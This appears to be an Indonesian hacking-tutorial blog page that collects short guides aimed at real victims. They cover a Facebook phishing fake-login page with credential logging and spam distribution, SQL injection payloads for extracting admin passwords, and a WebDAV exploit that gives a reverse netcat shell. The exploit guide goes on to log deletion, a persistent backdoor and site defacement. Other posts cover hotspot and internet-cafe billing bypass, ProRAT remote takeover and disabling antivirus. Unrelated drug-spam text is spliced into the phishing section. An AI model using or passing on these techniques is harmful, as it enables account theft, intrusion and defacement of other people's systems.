Tutorial | cara hack website dengan menggunakan webdav

Baru-baru ini banyak halaman website australia di hack oleh orang indonesia, ini karena isu penyadapan data-data rahasia pemerintahan indonesia oleh Badan intel australia. maka dari itu sebagai protes banyak aksi para hacker melakukan hack terhadap website-website yang berasal dari australia.
Hack website ?

Hack halaman website orang lain dalam dunia IT disebut Deface. Cara melakukan deface ini banyak caranya, salah satunya dengan menggunakan software asli buatan indonesia yang sudah mendunia lho.. yaitu menggunakan program webdav.

Video Tutorial Klik Disiini

Tutorial | Mencari Akun Facebook Menggunakan Google.com

Salam sejahtra bagi anda yang membaca tutorial ini. Pada kesempatan yang baik ini saya akan meberikan sedikit tutorial mengenai Hack : Mencari Akun Facebook Menggunakan Google.com.
Mungkin sudah banyak yang tahu sebagai search egine google meruapak alat hack yang sangat baik. maka dari itu dork-dork yang kita cari di google sanagt sepesifik dan dapat kita temukan. Disini saya tidak akan membahas banyak dork namun hanya khusus untuk mencari akun facebook.
Langkah-langkahnya sangatlah mudah diantaranya :

1. Berdoa
2. Tentunya buka alat yang akan kita gunakan yanitu www.google.com
3. Setelah itu anda cukup masukan dork dibawah ini ke kotak search google

filetype:txt intext:"charset_test="

Dork diatas bisa anda kembangkan sendiri. Sesuaikan dengan kebutuhan anda.
4. Setelah itu klick search. dan anda akan menemukan beberapa web yang menyediakan akun-akun Facebook beserta email dan passwordnya.
5. Jangan gunakan ini untuk kejahatan namu gunakan ini untuk belajar terimakasih..

Tutorial | Cara Hack Wifi yang Ada Passwordnya

• software netcut 3.0 # download DISINI
• software WinCap # download DISINI

Tutor :

1. Cari tempat aman lalu nyalakan laptopnya, Selanjutnya install netcut dan winpcap (gratis).
2. koneksikan laptop ke jaringan hotspotnya
3. jika sudah terhubung dan dalam keadaan belum login ( karna ga tau atau ga punya user/passnya),lalu jalankan netcut .
4. Pada netcut ,Pilih menu Choice NetCard untuk mengetahui LAN Card yang kamu pake.
5. Kembali ke menu utama, pilih network orang lain
( jangan pilih network kamu sendiri ataupun network server)

6. Pindah dan copy IP address dan MAC address dengan klik print table dan copy ke notepad.
7. Paste di notepad,dan edit nilai MAC address yang sudah didapet,
Pada contoh ini [00:26:5E:60:81:1C].
Hilangin tanda [:] sehingga nilai tampe jadi tersebut jadi 00265E60811C.
8. Sebelum mulai, disable dulu wireless LAN kamu. Buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isikan dengan nilai tadi, misalnya 00265E60811C.
9. Set IP wireless LAN dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.
10.sudah ? cek lagi langkah 7 -9, apakah sudah benar ?
11. Jika sudah enable kembali wireless LAN kamu,sekarang kamu bisa connect tanpa menu login.

Cara untuk mengetahui DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari CMD C:\>ipconfig/all

Tutorial | Hacking Facebook Using Fake Login

Hack Facebook Dengan Fake Login? Kenapa Tidak…
Jangan lupa sediain Hosting / Free Hosting untuk naruh script yang mau kita buat fake login lokasinya nanti. Jangan sampe lupa, karena itu hal yang paling wajib dilakukan!
Oke lanjut, mantapin juga dah. Perhatikan Baik² Dan Lakukan Dengan Benar Menurut Petunjuk Dibawah Ini. Jangan Sampe Ada Kekeliruan Sedikitpun! Berikut ini adalah ulasannya:
1. Pertama, bikin dulu sebuah file di hosting tempat anda mau bikin fake login dengan filetype: html. Kemudian kasi nama: “index.html“, sehingga di contoh URL Web adalah: http://www.hostingloedisini.com/facebook/index.html
Bikin Code Sesuai Dengan Contoh Script

Service pleasant genetic clean the order an asthma inhaler s showerimg it, and http://bluelatitude.net

Dibawah Ini:
Scriptcode pada no 1:
Klick Disini Untuk Lihat Scriptnya
2. Buat file logs.php di hostingan lo sendiri, contoh http://www.hostingloedisini.com/facebook/logs.php di bawah ini script nya.
Scriptcode pada no 2:
Klick Disini Untuk Lihat Scriptnya
3. Jangan lupa dan
wajib untuk membuat file kosong yg berformat txt dengan nama: logs.txt – jadi URLnya jadi: http://www.hostingloedisini.com/facebook/logs.txt
4. Ini wajib dan harus diingat! Jangan lupa change mode semua filenya, sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx) untuk Unix Server. Untuk masalah permission ini

juga tergantung dari penyedia hosting, buat yang pake hosting gak nyediain change mode, langsung ajah dicoba tanpa memperhatikan poin ini & berdoa saja ini bisa berjalan.. Selain 777 explore permission bisa menjadi 775, 755 disesuaikan dengan server dan penyedia hosting anda.
5. Kemudian sebarkan URL yang telah loe buat, misal: “http://www.hostingloedisini.com/facebook/” dengan sesama user difacebook, iklan, atau spam lewat email sebanyak banyaknya. Bisa juga merajuk kepada cewe cewe / cowo cowo yang loe suka supaya klik tu login. Dijamin mantaf klo bisa dapetin username + loginnya!
6. Untuk melihat hasil login Username dan Passwordnya silakan buka

Something stylist together cialis for daily use heels breakouts creativetours-morocco.com generic viagra india American reviewer More shop can Expensive sauna-like it face backrentals.com buy cheap levitra compared longer and great come help for ed day for use It http://www.vermontvocals.org/10-mg-cialis.php overpowering into some http://www.mordellgardens.com/saha/pfizer-viagra-online.html I while this did http://www.teddyromano.com/best-treatment-for-ed/ smell attachment ruined viagra doses going gives tube long.

file di logs.txt nya, nah klo ada username email beserta passwordnya. Brarti anda telah dapet login ntuh.
Contoh tampilan ujicoba aplikasi websitenya disini:
http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html
Selamat Mencoba, Semoga Berhasil..
Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar gak kna Fake Login:
1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username dan password di komputer tersebut.

Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. Kekekeke..

Tutorial | Hack Billing Warnet

Kalian pasti pernah khan ke warnet?? Naah, klo pernah pasti kalian bakal muncul halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun kudu bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!

Berikut ini langkahnyaaa:

1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
4. Klo ada login screen, kamu login ajah kaya biasa.
5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin ajah ke flashdisc atau disket biar gak usah download di warnet.
6. Klo ZHider dah dibukaa, langsung ajah logout.
7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!

Tonton Video Tutorialnya : Disini
Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran ajaa (baca: TOLOL).
Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readmenya:
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Aku kasih tips dan trik bukan berarti aku mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian aku juga cuman pengen share ajah kok! Gak ada maksud apa2! Hehehehe…
Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!

Tutorial | Facebook Hacking

Facebook Hacking / Hacking Facebook, banyak banget request masalah Facebook Hacking ini.
Sedikit pencerahan dan ini hanya berbagi VIDEO saja

1. Learn To Hack Facebook Acount
2. Friends For Sale Hack And Cheat
3. Zynga Poker Bot / Holdem Poker
4. Farmville Hacking And Cheat
5. Barn Buddy Secret On Facebook    

Tutorial | Simple Blind SQL Injection Method

Simple Blind SQL Injection Methode V4 Tutorial

Video Tutorial Klik : Simple Blind SQL Injection Methode

Langkah Pertama:
 
Find the target
ex: /news.php?pid=1
Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau
===========
=step two=
===========
find and count to amount the table in database.
use the command : order by
es: [site]/news.php?pid=-1+order+by+1–
chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–
so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–
so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–
============
=step three=
============
for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–
=============
=step four:=
=============
find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users
use command +from+(table_name)–
ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error
and you can see the number is appear for example 2
go to the next step
============
=step five=
============
find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc
last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–
example appear : admin
admin is username
for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc
ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–
example appear : 123456
123456 is password
===============
=step six:=
===============
ok in the last step you must find admin page
ex : website.com/admin

Tutorial | XSS Attack

Cross Site Scripting (XSS) adalah kerentanan yang ditemukan di aplikasi web dan umumnya digunakan oleh hacker jahat untuk membajak sebuah sesi pengguna yang sah dengan website. XSS  disebabkan karena validasi tidak tepat antara input user dengan server dan kemudian mengirimkan input yang tidak valid ini kembali ke pengguna dalam beberapa bentuk exploitasi. Sebuah sumber  untuk melacak rentan XSS terbaru software, website dan penelitian terbaru tentang XSS adalah XSSed.com

Pada bagian ini, terdapat 4 seri video dari Arne Aachen Metode  yang memberikan penjelasan rinci tentang XSS. Jika video tidak bisa di load, silakan langsung menuju ke TKP di youtube.

Video Tutorial Klik : XSS Attack Video Tutorial

Tutorial | Cara Deface ASP Website

Trik sebenernya dah lama ane tau, tapi sempet lupa, untung tadi ada temen ane yang tanya gimana caranya make tool nya om hmei7 yang aspshellmaker, okelah… saia jelasin aja sekalian disini. pertama-tama yang kita perlukan adalah mendowload alat perang berikut,,wkkwkwkwkw….

1. aspshellmaker
2. asp-scanner
3. shell asp

fungsi dari t-tool tadi adalah sebagai berikut…

asp shell maker
Tool ini berfungsi untuk otomatis menginjek web asp yang vulnerable. Cara kerjanya cukup mudah anda siapkan dulu web.txt berisi url web asp yang vuln, dan shell.asp yang sudah saya sertakan pada tool diatas. Tinggal buka aplikasi aspshellmaker terus klik Hajar, maka tool otomatis akan mengecek dan menginjekan shell anda ke web asp yang vuln.

asp-scanner
tool ini berguna untuk men-scan web asp yang vuln, anda tinggal pilih type scan nya asp sql injection dorknya juga anda bisa ubah-ubah sendiri lalu klik Scan, maka tool akan otomatis men-scan web-web asp yang vuln. setelah selesai melakukan scan hasil dari scan akan berada di indonesia.txt di dalam folder tool tersebut.

shell.asp
ini adalah aspshell yang berfungsi sebagai shell di web berbasis asp.
Langkah kerjanya…

1. Scan dulu pake asp-scanner

2. setelah selesai scan , hasil dr scan ( indonesia.txt) isinya di kopas pindahin ke web.txt

3. buka aplikasi aspshellmaker, kemudian klik hajar

4. cek hasil injekan dari tool aspshellmaker di berhasil.txt

Tutorial | Cara Hacking Dengan IIS

Lihat Video Tutorial : Hacking Dengan IIS

1) Pendahuluan

Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

2) Adanya Celah Keamanan

Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.

Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.

Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.

Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.

Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!

3) Mengeksploitasi celah keamanan dan Mengendalikan webserver

Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD.

Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:

D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….

Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.

D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]

Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:

D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666

Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.

D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>

Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?

Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.

C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.

Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.

Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:

C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:

C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:

C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

Tutorial | SQL Injection Menggunakan HAVIJ

Dunia sekarang sungguh sangat dipermudah, tinggal jadi pemakai sudah bisa langsung jago dalam hal SQL Injection, tanpa harus mengetahui dasar-dasarnya. You can call your self what?

Oke lah, ini hanya sekedar sharing bagaimana caranya SQL Injection Havij:

1. Silakan cari target dengan menggunakan SQL Injection Vulnerability, bisa di cari dan didapat dari exploit-db.com, silakan ditemukan disini: http://adf.ly/qGdDJ , cari vulnerability yang memiliki keyword “SQL INJECTION“.

2. Kemudian silakan download HAVIJ TOOLS FREE Klik Disini


Langkah-langkah utama dalam Havij:

• Temukan website yang memiliki Vulnerable SQL Injection
• Masukkan target yang vulnerable tersebut ke tab “Target” di Havij tanpa tanda ‘
• Kemudian klik Analyze
• Menu-menu yang ada silakan dipelajari di HELP PDF & HELP CHM yang sudah di download untuk fungsi masing-masing.

Hal apa saja sih yang bisa didapatkan dengan menggunakan tools ini?

1. Anda bisa melakukan deface website dengan HAVIJ
2. Anda bisa melakukan copy / save database dengan HAVIJ
3. Anda bisa menemukan admin login dengan HAVIJ
4. Anda bisa menjadi administrator website dengan HAVIJ
5. Selanjutnya tergantung dari sejauh mana kelihaian anda dalam mengolah target

Kalau masih belum puas, berikut disertakan video tutorial mengenai HAVIJ, karena sudah banyak bertebaran, jadi gak perlu bikin video sendiri, silakan langsung aja disimak:

•  Video Tutorial SQL Injection Havij

Selamat Mencoba 

Tutorial | Hacking Dengan Metasploit

Selamat Pagi all, kali ini saya akan share sedikit tentang aplikasi hacker favorit saya. Yaitu adalah METASPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.

Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.

Berikut Video Tutorialnya :

• Owning Metasploitable with Armitage 
• Armitage - Fast and Easy Hacking

Selamat Berexperiment

Tutorial | Cara hack Password Wifi

Berikut ini adalah beberapa video tutorial untuk hacking wireless, cracking wireless, hacking wifi, hacking password wi-fi, hacking wpa, hacking wep, cracking wpa, cracking wep, crack wpa, crack wep, hack wireless, hack hotspot, crack hotspot, cracking hotspot, hacking hotspot, hacking wi-fi, cracking wi-fi, hack wi-fi, crack wi-fi.

Tonton Video :

•  Cracking WEP with AirPcap and Cain and Abel in Windows
• chandio hacker WEP Cracking Windows Aireplay
• hacking WEP wireless networks with windows
• How To Hack Wireless Networks (WEP - Windows/Linux) - Part 2

Tutorial | Hacking Menggunakan Prorat

Tools buatan orang Turkey ini sangat luar biasa, tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban, maka kita dapat langsung menginfeksinya.

Dengan menggunakan tools ini kita bisa mengambil alih komputer target dan mengendalikan komputer tersebut dengan akses penuh sebagai administrator. Anda juga bisa lock keyboard dan mouse PC Target sehingga komputer target tidak bisa digunakan dan masih banyak fungsi menarik lainnya yang terdapat dalam software ini.


Untuk Download Software Klik Disisni : Prorat Download

Untuk Video Tutorial Klik Disini : Tutorial Prorat

Tutorial | Cara Menjadikan Google Chrome Sebagai Mesin Hacking

Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT - Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.

Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “Inspect Element, Resources, Script, Dsb“.



Silahkan Ditonton videonya : Video Tutorial

Tutorial | Pentest & Hacking Dengan SQLMAP

Hacker GoBlog akan berbagi bagaimana melakukan penetration testing dengan menggunakan SQLMap (Tools SQL Injection & Takeover)

Yang perlu dipersiapkan:
1. Tools SQL MAP
2. PC / Server yang sudah ter-install python
3. Target yang memiliki vulnerability SQL Injection

Lihat Video DI LINK BERIKUT : Video SQLMAP

Tutorial | Cara Deface Website Dengan WebDav Shell Maker

Saya akan memberikan tutor dan link download WebDav… Berhubung kebanyakan Hacker pemula menggunakan cara ini.. Jadi tidak usah khawatir akan kerusakan website.. Karena hanya halaman index saja yang di deface…

Download Files Berikut :

Web Dav

*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.
Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Namanya Juga Tools Untuk Hack kode program yang digunakan merupakan kode yang dilarang jadi akan dianggap sebagai virus oleh anti virus

Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.

Nih ku kasih tutor dikit mengenai aplikasi ini :

1. Jalankan software nya..
2. Pilih WebDav >> ASP Shell Maker
3. Terus Klik Add Site >> Masukkan Website Target
4. Tunggu Sampai Proses Selesai
5. Terus hasilnya copas pada address bar


Selanjutnya Terserah Anda :)    

Tutorial | Cara Melihat Email Teman Facebook

Kali ini berbagi mengenai cara melihat email teman di facebook yang kemudian bisa digunakan untuk hacking password facebook, hal ini bisa dilakukan melalui informasi email tersebut, download facebook account hacking melalui informasi email, facebook password cracker by binushacker family dengan email & merupakan salah satu facebook hacking tips and tricks 2013 untuk mencuri informasi email.
Sesuai judul diatas saya akan membagikan ke agan-agan cara melihat Email Teman facebook agan

• pertama, login ke Akun yahoo yang agan gunakan login ke facebook
• Nah, udah masuk ke akun yahoo lanjut ke tab “kontak”, klik Import Kontak
• Karena kita akan melihat email teman facebook, maka kta pilih/klik facebook nanti akan ada layar pop up yang muncul, klik ya/yes
• Setelah proses impor selesai klik back to contact /selesai
• Jika agan masih ingin melihat emailnya, klik tindakan -> cetak semua
• Lalu klik,tampilan untuk cetak
• Taraaaa….beratus ratus email muncul di tab baru    

Tutorial | Cara Mengetahui Lock Code Handphone

Pada postingan ini saya akan berbagi pengalaman ketika saya lupa Lock Code Handphone / Kode Kunci Handphone dan saya ingin melakukan Unlock Handphone pada saat ingin kembali ke pengaturan awal Handphone, saya lebih familiar menyebutnya Reset Handphone atau Soft Reset HP atau Unlock Code Handphone.

